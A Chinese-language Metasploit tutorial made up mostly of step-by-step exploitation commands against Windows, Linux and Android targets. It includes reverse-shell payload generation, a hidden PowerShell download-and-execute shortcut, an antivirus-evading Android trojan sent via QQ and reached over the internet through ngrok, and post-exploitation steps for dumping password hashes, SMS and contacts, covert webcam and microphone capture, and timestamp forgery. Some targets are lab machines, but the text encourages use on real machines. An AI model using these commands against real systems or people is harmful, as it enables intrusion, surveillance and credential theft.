MSF框架

一.初识 MSF

1.1什么是Metasploit

Metasploit就是个漏洞框架。 它的全称叫做The Metasploit Framework ,简称MSF。是一个免费、可下载的框架,通过它可以很容易地获取、开发并对计算机软件漏洞实施攻击。它本身附带数百个已知软件漏洞的专业级漏洞攻击工具。当H.D. Moore在2003年发布MSF时,计算机安全状况也被永久性地改变了。仿佛一夜之间, 任何人都可以成为黑客,每个人都可以使用攻击工具来攻击那些未打过补丁或者刚刚打过补J的漏洞。软件厂商再也不能推迟发布针对已公布漏洞的补丁了,这是因为MSF团队一直都在努力开发各种攻击工具,并将它们贡献给所有MSF用户。
MSF的设计初衷是打造成一个攻击工具开发平台 ,然而在目前情况下,安全专家以及业余安全爱好者更多地将其当作种点几下 鼠标就可以利用其中附带的攻击工具进行成功攻击的环境。

1.2MSF专业术语讲解

1.2.1渗透攻击(Exploit)

渗透攻击是指由攻击者或者渗透测试者利用系统、应用或服务中的安全漏洞,所进行的攻击行为。
流行的攻击技术包括:缓冲区溢出、Web应用程序漏洞攻击,以及利用配置错误等。

1.2.2攻击载荷(Payload)

攻击载何是我们期望目标系统在被渗透攻击后而执行的代码,在框架中可以自由的选择、传送和植入。比如,反弹式shell 是一种从目标主机到攻击主机创建网络连接,并提供命令行shell 的攻击载荷。bind shell 攻击载荷则在目标主机上将命令行shell 绑定到一个打开的监听端口,攻击者可以连接这些端口来取得shell交互。

1.2.3溢出代码(Shellcode)

shellcode是在渗透攻击时作为攻击载荷运行的一组机器指令。shellcode通常用汇编语言编写。在大多数情况下,目标系统执行了shellcode这一组指令后 才会提供一个命令行shell或者Meterpreter shell ,这也是shellcode名称的由来。

1.2.4模块( Module)

在MSF中,一个模块是指MSF框架中所使用的一段软件代码组件。在某些时候,你可能会使用一个渗透攻击模块( Exploit module ).也就是用于实际发起渗透攻击的软件组件。而在其它时候,则可能使用个辅助模块( auxiliary module ).用来扫描一些诸如扫描或系统查点的攻击动作。

1.2.5监听器(Listener)

监听器是MSF中用来等待连入网络连接的组件。举例来说,在目标主机被渗透攻击之后,它可能会通过互联网回连到攻击主机上,而监听器组件在攻击主机上等待被渗透攻击的系统来连接,并负责处理这些网络连接。

二.更新MSF以及目录结构

2.1.如何更新MSF

首先,替换源,可以换成阿里源,将原本的源用#注释掉,因为国内访问它的源太慢。

然后,添加数字签名。

有时候会出现故障,就得把老的MSF卸载:apt remove metasploit-framework

更新命令:apt-get update(这些都是在msf中执行的命令)

安装MSF框架:apt-get install metasploit-framework

进入msf:msfconsole

若提示没有相应的数据库支持:quit (退出msf)

启动数据库:systemctl start postgresql

允许开机自启:systemctl enable postgresql

构建数据库缓存:msfdb init

2.2.MSF的目录结构

MSF 在BT5下存放目录:/opt/MSF

MSF 在kali 下存放目录:/usr/share/metasploit-framework/

2.3.Modules(模块)

存放路径:/usr/share/metasploit-framework/modules/(个人写的模块也可以存放在这里)

2.3.1.Auxiliary

主要包含渗透测试中一些辅助性的脚本,这些即本功能有扫描,嗅探,破解,注入,漏洞挖掘等。

2.3.2.Encoders

各种编码工具用于躲过入侵检测和过滤系统。

2.3.3.Exploits

主要包含了传说中的exp、0day. 各种漏洞利用的脚本。主要的攻击代码全在这,这里边包含的exp的路径的命名规则是系统/服务/模块,在使用exp是可以根据这个命名方法来找(也可以用search这条指令来找)比如:use exploits/windows(系统)/vnc(服务)/realvnc_client(模块名)

2.3.4.Nops

NOP (No Operation or Next Operation) sled,由于IDS/IPS会检查数据包中不规则的数据,所以在某些场合下(比如针对溢出攻击),某些特殊的滑行字符串(NOPS x90x9…)则会因为被拦截而导致攻击失效,所以此时需要修改exploit中的NOPs.nops文件夹下的东西会在payload生成时用到(后面会有介绍)。比如我们打开php的NOPS生成脚本,就会发现它只是返回了指定长度的空格而已。(不理解没关系)。

2.3.5.Payloads

这个单词翻译过来叫载荷:是攻击者发送给系统执行的指令(不包含exploits 攻击阶段) , payloads主要是在目标机执行的,而exploits是在本地机执行作用于目标机。命名规则是:系统/类型/名称比如: use payloads/windows/shell/bind_tcp.

2.3.6.Post

这个目录里放着msf的exploits执行成功后,向目标机发送的一些功能性指令,比如:提权,获取hash等。

2.3.7.Data

这个目录里盛放了Meterpreter、PassiveX、 Vnc、 DLLS 等这些工具和一些用户接口代码, Msfweb和一些其他模块用到的数据文件。

Data下js文件夹下的Detect ,这里面存放的是MSF的探针文件。如果看过MSF浏览器攻击脚本的代码,就会发现调用了一个js库,然后检查当前请求是否符合被攻击环境。如果符合则发送攻击代码,否则中断。Memory中主要是一些堆喷射代码。 在大部分浏览器漏洞利用过程,堆喷射是一个不可或缺的过程(当然不是绝对的! )。并且不同的浏览器及版本间,堆喷射代码都有所不同。

2.3.8.Plugins

这里的模块用户需要使用load来加载提供数据库连接插件和各种要用到的插件。

2.3.9.Scripts

这个目录下的文件大都是Meterpreter这个模块利用的脚本,比如Meterpreter里用到的migrate来转移到其他进程的指令的源代码就在这个目录下。

这里的rc脚本相当于Windows下的批处理脚本, 在某些情况下会有一定便捷性。比如Veil 在生成免杀payload的同时也会生成一个rc脚本,此时使用msfconsole -r xx.rc便可以快速的建立一个和payload对应的handler ,亦或在攻击过程中需要你反复的set exploit,那么就可以使用这个批处理脚本了,而这个目录下则是一些给定的rc脚本,虽然你可能不习惯这样使用,但作为改写自己的rc脚本的资源也不错。

2.3.10.TOOLS

包含一些有用的脚本和零散的工具。

三.MSF基本命令

3.1.Msfconsole控制台

它是一个一体化集中控制台,允许你访问到几乎所有的MSF框架选项。MSF起初看似吓人的,但一旦你学习他的语法命令,你将会欣赏利用该接的力量。

3.2.Msfconsole的好处

这是唯一能访问大多数支持在MSF特点。

Console- based界面提供了一个框架。

具有最稳定的MSF界面。

充分支持Readline,Tabbing以及其他各类命令。

支持Msfconsole外部命令执行。

3.3.Msfconsole命令

?:命令帮助,可以使用的命令

在?后面加命令(和前面的?有空格):可以解释该命令的含义

search:搜索模块名和描述

use:+模块路径和模块本身 ->使用该模块

进入模块:info -> 查阅该模块信息 / check -> 检测

back:从当前环境(模块环境)返回 ,返回到上一级目录(类似于 .. )

banner:显示MSF的banner的信息

color:颜色转换

connect:+IP地址或者域名+端口号 -> 连接主机

exit/quit:退出MSF

irb:进入irb脚本模式

jobs:显示和管理作业(和windows下的任务管理器的进程作用一样)

kill:+进程名字 -> 杀死一个作业(和结束进程作用一样)

loadpath:加载一个模块的路径

load:加载一个插件

upload:卸载一个模块

resource:运行储存一个文件中的命令

route:查看一个会话的路由信息

save:保存动作

set:给一个变量赋值 (如:set RHOST 192.168.133.133)

unset:解除一个或多个变量

setg:把一个赋值给全局变量,例如上述的set 设置的IP,就会用到其他攻击模块的RHOST中。

unsetg:解除一个或多个全局变量

sleep:在限定秒数内什么也不做

show:显示所有类型的模块

version:显示MSF和控制台库的版本

四.Exploits And Payloads 模块

show + 模块名(s) -> 查看该模块下可以使用的

4.1.Exploits 模块

命名规则:系统/服务/名称
例如: windows/smb/ms08_067_netapi

RHOST :目标主机IP地址

RPORT :目标主机连接端口。

Payload :有效的载荷,成功后返回shell.

LHOST :攻击者的IP地址(我们自己就是攻击者)

LPORT :攻击者的端口

SRVHOST:攻击者自己搭建的服务器的IP地址

SRVPORT:攻击者自己搭建的服务器的端口号

SSL:证书

URIPATH:路径

4.2.Payloads 模块

是在使用一个模块之后再去使用的。

命名规则:系统/类型/名称
例如: Windows/dllinject/reverse tcp.

类型命名规则
shell:上传一个shell,。
dllinject:注入一个dll到进程。
patchup*** :修补漏洞。。
upexec:上传并执行一个文件。
meterpreter :高级的payload。
vncinject :高级的payload。
passive :高级的payload。

名称的命名规则
shell find tag在一个已建立的连接上创建一个shell,
shell reverse_tcp:反向连接到攻击者主机并创建一个shell
bind_tcp:监听一个tcp连接。
reverse_tcp:反向建立tcp连接。
reverse_http通过HTTP隧道通信并创建一个新用户添加到管理组。
add_user创建一个新用户并添加到管理组。
xxx_ipv6_tcp:基于IPV6
xxx_nonx_tcp:no execute或win7 ( NX是应用在CPU的一种可以防止缓冲区溢出的技术)
xxx_ord_tcp:有序payload。
xxx_tcp_allports:在所有可能的端口。

五.MSF漏洞实例测试

三种攻击实例

5.1.网络服务器攻击渗透(MS08_067)

用到的靶机:WinXPenSP3

首先,执行msfconsole命令:msfconsole

接着,搜索ms08_067目录:search ms08_067

然后,

5.2.浏览器攻击渗透(MS10_018)

用到的靶机:WinXPenSP3

首先,执行msfconsole命令:msfconsole

接着,搜索ms10_018目录,搜索模块路径:search ms10_018

然后,进入搜索到的模块:use + 模块路径

查看该模块使用以及会影响win的详细信息:show options

设置自己服务器IP:set SRVHOST + IP地址(这里就填kali的IP,一般来说填公网IP地址)

设置一下端口,为了方便识别:例如:set LPORT 4441

设置一个payload正向连接shell:例如:set PAYLOAD windows/meterpreter/bind_tcp

再看我们payload的选项配置:show options 一下(就是可以看到我们上面是否把配置的参数放进去了)

run 一下,会有一个 url 地址,这个地址就是要通过社工等方法让目标机进行访问(抛出一个诱导,让肉机访问)(当肉机点击访问后,我们就有可能得到肉机的系统权限)

查看我们得到的肉机信息:sessions -i

进入肉机系统:sessions -i +肉机编号(看有多少台机器上钩)

5.3.应用软件格式渗透,利用word去渗透(MS10_087)

用到的靶机:WinXPenSP3

首先,执行msfconsole命令:msfconsole

接着,搜索ms10_087目录,搜索模块路径:search ms10_087

然后,使用这个模块:use + 模块及它的路径

查看该模块使用以及会影响win的详细信息:show options(看看要设置哪些信息)

设置需要设置的信息,显然这个模块要设置文件名(如果不设置就是保持它原本的默认名)

设置一个payload,前面我们都是设置的交互式的,这里我们换一个payload:例如:set payload windows/exec

再看我们payload的选项配置:show options 一下(就是可以看到我们上面是否把配置的参数放进去了),这里也会提示我们还要设置什么payload选项

这里出现还要我们设置CMD:这是处于win类似元终端执行的命令,比如我们执行弹出一个计算器:set CMD calc.exe

run一下,我们就会得到word文档,就是我们之前自己设计的文件名,它会告诉我们生成文件的位置

然后我们可以把它拷贝到home里:home:mv +文件路径/home/,然后再托到本机,就可以看出效果了

5.4.网路服务器攻击渗透测试(MS17_010)

用到的靶机:Win7

首先,执行msfconsole命令:msfconsole

接着,搜索ms17_010目录,搜索模块路径:search ms17_010(这个就是之前的永恒之蓝)

然后,使用这个模块:use + 模块及它的路径

查看该模块使用以及会影响win的详细信息:show options(看看要设置哪些信息)

设置需要设置的信息:set RHOST,LHOST(这个不是必须设置的,要求上没有它,但是还是设置一下)

设置一个payload,设置一个64位的:set payload windows/x64/meterpreter/reverse_tcp(反向连接,只要被攻击机存在漏洞时,就会反向连接到攻击机上)

再看我们payload的选项配置:show options 一下(就是可以看到我们上面是否把配置的参数放进去了),这里也会提示我们还要设置什么payload选项。

run一下,当我们进入了meterpreter模式,就说明我们拿到了shell,shell 一下,我们就直接进入到别人的系统

5.5.利用 samba 服务漏洞入侵 Linux 主机(CVE-2017-7494 与 samba 低版本漏洞利用)

Samba是在Linux和UNIX系统上实现SMB协议的一个免费软件 ,由服务器及客户端程序构成samba服务对应的端口有139,445等等。本文将简单介绍metasploit利用samba漏洞入侵进入远程linux主机。

  1. 首先要扫描目标主机上开放的端口和服务,用nmap,命令如下:
    nmap -sS -Pn -A 192.168.133.133

  2. 发现主机上开放的139 , 445端口之后,说明该主机有可能存在samba服务远程溢出漏河,尝试通过该端口建立一个meterpreter会话,需要用到metasploit。

  3. 打开metasploit之后需要先判断samba的版本,命令如下:

    msf> search auxiliary/scanner/samba

    这条命令用来查找samba相关exploit 参数

  4. 然后使用如下命令来定义要扫描samba的版本所用到的exploits参数

    msf> use auxiliary/scanner/smb/smb_version

    msfauxiliary(smb_version) > set RHOSTS 192.168.133.xxx(这两步是扫描这个肉鸡是否能被攻击)

    这条命令定义你将要扫描samba版本的远程主机的IP地址。

    exploit :开始漏洞利用

  5. 发现samba版本之后,我们需要进一步利用来入侵进入到远程linux主机

    msf> use exploit/multi/samba/usermap_script
    msf exploit(usermap_script) > set RHOST 192.168.133.xxx

    msf exploit(usermap script) > exploit

    执行完成以上命令如图所示,成功创建了shell 会话。

(二)smb 其他漏洞 Linux smb 漏洞(CVE-2017-7494)复现

漏洞编号: CVE-2017- 7494.
漏洞等级:严重
影响版本:漏洞影响了Samba 3.5.0之后的版本,不包含4.6.4/4.5.10/4.4.14

  1. 查看samba版本

    samba -V #查看samba版本

  2. 打开samba配置文件添加以下配置,配置共享:

    vi /etc/samba/smb.conf

    在末行加入:

    [public]

    comment = public
    browseable = yes
    writeable =yes
    path = /tmp/public
    public = yes
    read only = no

    :wq #保存退出

  3. Kali Linux 2017里面创建Samnba共享目录,创建共享目录

    创建共享目录:mkdir /tmp/public

    修改执行读写权限:chmod 777 /tmp/public/

    这是 SambaCry 漏洞利用的前提,必须有一个共享目录,这样攻击者就可以在共享目录下传递攻击代码并执行,获得root 权限并控制肉鸡。

  4. Kali Linux 2017 重启/ 启动 Samba 服务

    重启 Samba 服务:/etc/init.d/samba restart

    查看 Samba 进程:ps aux | grep samba

    查看Samba 端口状态:netstat -tnlp samba(采用445和139端口)

  5. 更新MSF 后使用”exploit/linux/samba/is_known_pipename”利用模块,设置 rhost 后直接 exploit 即可得到 shell

注意:有的 poc 会存在32位和64位之分,1-4的步骤是在肉鸡上的操作(被攻击的Linux机)

5.6.Bash Shellshock CVE_2014_6271(破壳)

Shellshock的原理是利用了Bash在导入环境变量函数时候的漏洞。启动Bash的时候不但会导入这个函数,而且也会把函数定义后面的命令执行。在有些CGI脚本的设计中,数据是通过环境变量来传递的,这样就给了数据提供者利用Shellshock漏洞的机会。

简单来说就是由于服务器的cgi脚本调用了bash命令,由于bash版本过低,攻击者把有害数据写入环境变量,传到服务器端,触发服务器运行Bash脚本,完成攻击。

本次实战环境:

metasploitable2 是一个非常不错的靶机 ,内置了多种漏洞来练习你的黑客技术。我将在独立网络环境中使用kali来攻击它,建议你也跟我一样, 确保在第一次尝试攻击时结果和我一样,等技术娴熟后就可以渗透真实的机器了。

  1. 第一步:配置靶机

    要利用此漏洞,要在 cgi-bin 目录下有一个可执行脚本,一个简单的输出 ”hello world ”脚本即可,因为仅仅是作为演示,进入靶机的 /usr/lib/cgi-bin/ 目录下,输入以下命令:

    命令:sudo nano hello.sh

    输入正确的密码后,对hello.sh 进行编辑:

    #! /bin/bash

    echo “Content-type:text/html”

    echo “”

    echo “Hello World !”

    保存好后,赋予脚本可执行权限,用 chmod 命令:sudo chmod 775 hello.sh

    我们来验证以下,通过浏览器访问该脚本,可以看到已经成功执行:192.168.133.139/cgi-bin/hello.sh

  2. 第二步:准备攻击

    在kali中,进入 metasploit :msfconsole

    我们可以通过 search 来搜索 exploits ,输入search shellshock ,这样就能搜索到 apache_mod_cgi_bash_env_exec 模块

    输入 :show options 来查看该模块要配置的东西

    大部分是选择默认配置,这里只要配置远程 RHOSTS ,本地监听的IP LHOST和文件路径 targeturi :set targeturi /cgi-bin/hello.sh

    设置了本地IP LHOST,就得设置payload ,命令:set payload linux/x86/shell/reverse_tcp

  3. 第三步:getshell

    一些 metasploit 模块有一个非常便利的小功能,就是检测靶机是否有漏洞,输入 check 命令检测即可,这将会把靶机是否存漏洞检测出来。

    输入:exploit 命令进行攻击

5.7.PHP CGI 漏洞利用

一般通过 phpinfo 来查看是否符合CGI漏洞利用,通常看 Server API :CGI / *,CGI是服务器的扩展功能(比如:留言板提交,IIS/Windows 的php 要用到)

靶机:metasploitable2

命令:

msf > search cve:2012-1823

msf > use exploit/multi/http/php_cgi_arg_injection

msf exploit(php_cgi_arg_injection) >show options

msf exploit(php_cgi_arg_injection) > set RHOSTS 192……

msf exploit(php_cgi_arg_injection) > run(或者exploit)

5.8.Java RMI SERVER 命令执行漏洞与 java cve_2013_0422

Java RMI SERVER 的 RMI 注册表 和 RMI 激活服务的默认配置存在安全漏洞,导致代码执行

利用步骤:

nmap -p0-65535 IP,查看 1099 端口是否开启

msf > use exploit/muti/misc/java_rmi_server

msf exploit(java_rmi_server) > set RHOSTS IP

msf exploit(java_rmi_server) > exploit

meterpreter >shell

二. java cve:2013-0422

5.9. Distcc 后门漏洞利用

安全组织索引:CVE-2004-2678,OSVDB-13378

Distcc 用于大量代码在网络服务器上的分布式编译,但是如果配置不严格,容易被滥用执行命令,该漏洞是Xcode 1.5 版本及其他版本的distcc 2.x版本配置对于服务器端口的访问不限制

利用步骤:
启动 metasploit

使用 exploit/unix/misc/distcc_exec 模块

set RHOSTS IP

exploit 执行攻击

id 查看权限, uname -a 验证

5.10.Druby 命令执行

Druby 配置不当,被滥用执行命令。(Druby 是开发语言,后缀名 .rb)

利用步骤:

metasploit 启动

发现 8787 druby 端口

search drb 搜索drb 相关漏洞,找最新模块并利用 use

set URL druby:IP:8787 # 设置目标druby链接 :druby://ip地址:8787(可设置可不设置,有可能设置后还攻击不了)

set RHOSTS IP

exploit 攻击

5.11. CVE_2017_8464 震网三代 (远程快捷方式漏洞)

漏洞详情:
北京时间2017年6月13日凌晨,微软官方发布6月安全补丁程序,“震网三代” LNK 文件远程代码执行漏洞(CVE-2017-8464)和Windows搜索远程命令执行漏洞(CVE-2017-8543)

CVE-2017-8543,当Windows搜索处理内存中的对象时,存在远程执行代码漏洞。成功利用此漏洞的攻击者可以控制受影响的系统。

CVE-2017-8464,当Windows系统在解析快捷方式时,存在远程执行任意代码的高危漏洞,黑客可以通过U盘、网络共享等途径触发漏洞,完全控制用户系统,安全风险高危。

攻击机:kali

靶机:win7

受影响的版本:win7,win8.1,win RT 8.1,win10,win Server 2008,win Server 2008 R2,win Server 2012,win Server 2012 R2,win Server 2016

步骤:

search 2017_8464

use exploit/windows/fileformat/cve_2017_8464_lnk_rce

set LHOST

run

它会生成以一堆快捷方式,我们要先把它们拷到 home 下,再拷到 window里(肉鸡):mv /…/ /home

然后,再msf中设置监听:

search multi/handler

use exploit/multi/handler

set payload windows/meterpreter/reverse_tcp

set LHOST

run

等待wins 点击快捷方式,当反shell 后会自动到 meterpreter 模式

payload2:利用powershell 快捷键

生成攻击文件,终端输入:

msfvenom -p windows/meterpreter/reverse_tcp lhost=ip -f psh-reflection>/opt/search.psl(exe类型的也可以)

然后,将 /opt/目录下的 search.psl 移到 /var/www/html/ 下:mv /opt/search.psl /var/www/html

随后打开 Apache 服务:service apache2 start

通过 web 访问 search.psl 文件 :192.168.133.128/search.psl

然后,在目标机器windows 上建一个快捷方式:

右击新建快捷方式,输入的对象位置:powershell -windowstyle hidden -exec bypass -c “IEX (New-Object Net.WebClient).DownloadString(‘http://192.168.133.128/search.psl');test.psl"

或者用工具:shortcut exploit builder

5.12. flash 0day (CVE-2018-4878)

漏洞详情:

Adobe公司在当地时间2018年2月1日发布了一条安全公告:http://helpx.adobe.com/security/products/flash-player/apsa18-01.html。公告称一个新的Flash 0Day漏洞(CVE-2018-4878)已经存在野外利用,可针对Windows用户发起定向攻击。攻击者可以诱导用户打开包含恶意Flash代码文件的Microsoft Office文档、 网页、垃圾电子邮件等。

漏洞影响:

Flash Player 28.0.0.137 及其以前的所有版本

漏洞复现:

攻击机:kali

目标靶机:win7 + IE8.0 + Flash Player 28.0.0.137

  1. 下载 cve-2018-4878 步骤:

    https://raw.githubusercontent.com/backlion/demo/master/CVE-2018-4878.rar (win7 中下载)

  2. 解压文件后可以看到 cve-2018-4878.py 和 exploit.swf ,我们只需要 cve-2018-4878.py

  3. 我们需要对 cve-2018-4878.py 进行修改,原作者将 stageless 变量改为了 Ture ,我们要把它改为 stageless = False,另外不能忘记修改最后的路径,py 中是 f=open(“root/2/index.html”,”wb”),我们 kali 中没有这个路径,所以在 kali 中要创建一个:mkdir /root/2/

  4. 在 kali 中生成 msf 的 shellcode (一定要注意:在老版本的kali 中生成的为333字节的 payload)

    命令:msfvenom -p windows/meterpreter/reverse_tcp lhost=192.168.133.128 lport=4444 -f python>shellcode.txt

  5. 然后要替换原来的 shellcode ,就是把生成的 shellcode.txt 里面的代码替换到 cve-2018-4878.py 中

  6. 接着,把cve-2018-4878.py 放到 /root/2 的文件夹里

  7. 在kali 中执行 cve-20018-4878.py 这个脚本,即可在同一目录下生成恶意的 swf 文件

  8. 然后,将生成的文件放到 win7 中,用IE 浏览器打开

  9. 在 msf 中设置监听

    use exploit/multi/handler

    set payload windows/meterpreter/reverse_tcp

    set LHOST,LPORT 4444(这个要和先前配置的端口一致)

    exploit

5.13. 生成 exe 的木马文件

命令:msfvenom -p windows/meterpreter/reverse_tcp lhost=192.168.133.128 lport=6789 -f exe -o /root/payload.exe

这是把木马程序存放于 kali 中,想办法传送到 win 10 中,并让其执行

设置监听:

msf> use exploit/multi/handler

set payload windows/x64/meterpreter/reverse_tcp

set LHOST 192.168.133.128

run

5.14. 渗透 Android 系统

5.14.1. 渗透步骤

1. 内网渗透

  1. 首先要把 Kali 攻击机 配置为 桥接模式,因为渗透 Android 系统 要在局域网下,所以 kali ,物理机,Android 要在同一网段下,这样三者之间可以互相 ping 通。

    同一个局域网就是要在同一个 WIFI 下。

  2. kali 机器要生成攻击脚本:

    命令:msfvenom -p android/meterpreter/reverse_tcp LHOST=192.168.0.111 LPORT=9999 R>/root/test.apk

    生成一个 apk 的脚本后,存放在 root 的目录下,复制到 window中,通过 QQ 发送到手机上,下载安装运行

  3. 这时,kali 要设置监听:

    进入 msfconsole

    使用 exploit/multi/handler 模块:use exploit/multi/handler

    设置payload:set payload android/meterpreter/reverse_tcp

    设置监听的攻击机 IP:set LHOST 192.168.0.111

    设置监听端口:set LPORT 9999 (IP 和 端口和上面脚本设置一致)

    渗透:run / exploit

    当脚本在手机中被运行时,kali 就会接受到信号,进入 meterpreter 的命令行

2. 外网渗透

  1. 首先我们需要下载一个用于内网穿透的工具来进行端口映射与转发。

    这里就用 Ngrok ,这个软件可以有免费版的(网速不行,不稳定,自娱自乐吧)

    在官网上注册并登录(https://www.ngrok.cc/#down-client)

  2. kali进入 ngrok 查看连接状态,命令:

    ./sunny clientid 你的id(这个id 在 ngrok 隧道管道中可以看到)

    利用转发的 tcp 和端口号

  3. kali 机器要生成攻击脚本:

    命令:msfvenom -p android/meterpreter/reverse_tcp LHOST=free.idcfengye.com LPORT=10227 R>/home/haoye/haoye.apk

    生成一个 apk 的脚本后,存放在 /home/haoye 的目录下,复制到 window中,通过 QQ 发送到手机上,下载安装运行

  4. kali 要设置监听(和上面内网渗透设置步骤一样)

Ngrok 注册安装可以看:https://blog.csdn.net/weixin_45798017/article/details/108564464

5.14.2. 后期 处理

  1. 手机拍照

    webcam_list #查看摄像头 (1 是后置,2是前置,但是我没看出什么不同)

    webcam_snap 1/2 #拍照

    webcam_stream 1/2 #摄像,录视频

  2. 手机录音

    record_mic

  3. 查看Android手机是否已经执行root权限

    check_root

  4. 导出Android手机的电话本

    dump_contacts

  5. 导出Android手机的短信记录

    dump_sms

  6. 远程控制目标手机发送短信

    send_sms -d 其他手机号 -t “内容”

  7. 对目标手机进行定位,查看目标手机位置信息

    geolocate

  8. 查看所有可执行命令

    ?

优点:该脚本不会报毒

弊端:上面的操作都得有权限,也就是手机下桌面的这个脚本的信息中的权限光有 “询问” 的权限是不够的,必须是 “允许”。

六.拓展:Auxiliary(辅助)模块

Auxiliary模块

情报搜集阶段,这一阶段主要是尽可能多的收集目标的各种信息。这里主要用到Msf里auxiliary里边的Modules,这里的Modules都是一些渗透前期的辅助工具。一般的收集信息可以使用Whois(这个是Linux 自带的),db_ nmap这个是Msf的一个插件) ,如果要使用到其他的一些收集信息的方法,比如使用Syn(一种不建立头层皮连接的扫描)扫描,可以在Msfconsole里边Search syn然后根据返回结果来确定使用哪个模块。

  1. Whois信息探测:在Mstconsole下使用Whois查看域名(domin) / IP信息。:whois + 域名/IP

  2. 利用模块查找邮箱:use auxiliary/gather/search_email_collector

  3. 因为 Google 国内引擎关闭了,所以我们设置不用Google引擎:set SEARCH_GOOGLE false(不关闭的话搜索时间就长一些),然后 run 进行搜索

  4. 使用 auxiliary 下的搜索 DNS 的模块:use auxiliary/gather/enum_dns,设置DNS时不要加www,然后 run 进行爆破

七. 拓展:Nmap (端口扫描) 模块

msf 内置 nmap 端口扫描模块,效果和 kali 中自带的 nmap 是一致的

7.1 Syn 扫描

如果TCP 扫描访问被拦截,就可以利用 syn 扫描(不建立连接的扫描)

扫描器向目标主机的一个端口发送请求连接的 SYN 包,扫描器在收到 SYN / ACK 后,不是发送的 ACK 应答而是发送RST 包请求断开连接。这样,三次握手就没有完成,无法建立正常的 TCP 连接,因此,这次扫描就不会被记录到系统日志中。这种扫描技术一般不会在目标主机上留下扫描痕迹。但是,这种扫描需要有 root 权限。
TCP connect 端口扫描服务端与客户端建立连接成功(目标端口开放)

过程:

  1. Client 端发送SYN;
  2. Server端返回SYN/ACK,表明端口开放;(如果返回 RST/ACK 表明端口未开放)
  3. Client端返回ACK,表明连接已建立;
  4. Client端主动断开连接。

优点:

SYN扫描要比TCP Connect()扫描隐蔽些,SYN仅仅需要发送初始的SYN数据包给目标主机,如果端口开放,则相应SYN-ACK数据包;如果关闭,则响应 RST 数据包。

步骤:

  1. use auxiliary/scanner/portscan/syn
  2. set RHOSTS 192.168.134.1..
  3. set THREADS 100 #设置线程,默认的是1,这里我们设置成100
  4. run 进行扫描

7.2 Tcp 扫描

  1. use auxiliary/scanner/portscan/tcp
  2. set RHOSTS
  3. set THREADS 100
  4. run 进行扫描

八. 服务版本信息探索

8.1. SMB 版本扫描

  1. 执行 use auxiliary/scanner/smb/smb_version
  2. show options 查看要哪些配置
  3. set RHOSTS IP

8.2. SSH 版本扫描

  1. 执行 use auxiliary/scanner/ssh/ssh_version
  2. show options 查看需要哪些配置
  3. set RHOSTS IP
  4. run

8.3. FTP 版本扫描

  1. 执行 use auxiliary/scanner/ftp/ftp_version
  2. show options 查看需要哪些配置
  3. set RHOSTS IP
  4. run

九.Meterpreter的后期攻击使用方法

9.1.上传文件到Windows主机

简单地来说,你可以上传本机的任意文件到目标主机,

命令:upload<file><destination>

(注意,file是包括它自己的路径的,同时,使用 -r 参数可以递归上传要上传的目录和文件)

例如:upload -r /home/haoye.exe c:\\ (注意,这里要有两个 \ )

9.2.从Windows主机上下载文件

download命令可以下载远程主机里的文件

命令:download<file><path to save> 例如:download C://haoye.rtf /home

注意:Windows路径要加双斜线,我们如果要递归下载整个目录包括子目录和文件,我们可以使用download -r 的命令

例如:

9.3.在目标主机上执行 exe 文件

我们也可以用 execute 命令在目标主机上执行exe的应用程序

命令:execute -f <path>[options]

例如:execute -f c:\\haoye.exe(双反斜杠)

9.4.创建CMD新通道

如果想在目标主机执行命令提示符

命令:execute -f cmd -c(这都是在 meterpreter 模式下的操作,类似于 shell 的命令)

9.5.显示进程

ps命令会显示目标主机所有正在运行的进程

命令:ps (和windows任务管理器查看内容是一样的)

9.6.获取admin权限

getsystem命令可以提权到本地系统权限

命令:getsystem

9.7.使用 Hashdump 转储所有 hash 值

我么可以使用 meterpreter shell 来 dump 目标主机当前系统账户和密码,转储的内容是 NTLM 哈希格式

NTLM 在线破解 :http://hashkiller.co.uk/ntlm-decrypter.aspx

命令:hashdump

输出的每一行格式如下:usrname:ID…..

它会得到几个不同权限的账号和 hash 密码

9.8.使用 Credcollect 转储 hash 值

还有一个类似的脚本叫 credential_collector ,也可以收集目标主机的 tokens

命令:run credcollect

9.9.创建端口转发

用途:当对方主机是在内网的情况下

meterpreter shell中的portfwd命令是转发技术中最常用的一个命令, 可以让攻击系统访问本来无法直接访问的目标主机。
add选项会将端口转发添加到列表中,而且本质上会创建一个隧道。

请注意:这个隧道存在于 meterpreter 控制台之外,任何终端会话都可以使用。

命令:portfwd add -l 6666 -p 3389 -r 127.0.0.1 #将目标机的3389端口转发到本地6666端口。(本地端口不能被占用)

9.10.删除端口转发

和创建端口转发命令类似,这条命令是删除一条端口转发记录

命令:portfwd delete -l <portnumber> -p <portnumber> -r <Target IP> n

如果你想显示所有端口转发记录,你可以使用 portfwd list 命令,

如果你想删除所有端口转发记录,你可以使用 portfwd flush 命令。

9.11.在目标主机上搜索文件

搜索命令可以定位查找目标主机上特定的文件,这个命令可以搜索整个文件系统,也可以用来搜索特定的文件夹。

例如,如果你想搜索目标主机上的所有 txt 文件,可以使用如下命令;

命令:search -f *.txt

9.12.获取用户 ID

getuid 命令会显示主机上与运行 meterpreter 服务的用户

命令:getuid

9.13.获取系统信息

sysinfo 命令会显示 系统名,操作系统,架构 ,语言等。

命令:sysinfo

9.14.模拟任何用户(token 操作)

这个进程对于攻击像微软活动目录这样的分布式系统非常有帮助,因为在微饮活动目录中,本地访问权限并没多大用,但是如果能搞到凭证尤其是管理员凭证,那就非常有用了。

incognito 最开始是一个独立的应用,当你成功入侵系统后可以用它来模拟用户tokens。这个应用后来集成到了metaploit 中,并且最终集成到了meterpreter 中,使用如下:

  1. 在 meterpreter 会话中加载这个模块非常简单,只要输入use incognito 命令即可。

  2. 输入list_tokens -u 来显示所有有效的tokens

  3. 然后我们需要模拟某个token来获取其权限。还有注意,如果成功模拟了一个token,我们可以使用 getuid 命令来检查当前用户ID。

  4. 切换到最高权限(SYSTEM),输入:impersonate_token “NT AUTHORITY\SYSTEM” (注意:SYSTEM权限是比管理员还要高的)

    use incognito ->list_tokens -u -> getuid -> impersonate_token “NT AUTHORITY\SYSTEM”

9.15 webcam 摄像头命令

webcam_list :查看摄像头

webcam_snap :通过摄像头拍照

webcam_stream :通过摄像头开启视频

9.16. execute 执行文件

execute :在目标机中执行文件

execute -H / -i -f cmd.exe # 创建新的 cmd 进程;-H 不可见;-i 交互(-i 不要加,加了在目标主机就会看到CMD的命令符界面)

9.17. timestomp 伪造时间戳

timestomp C:// -h #查看帮助

timestomp -v C://2.txt #查看时间戳

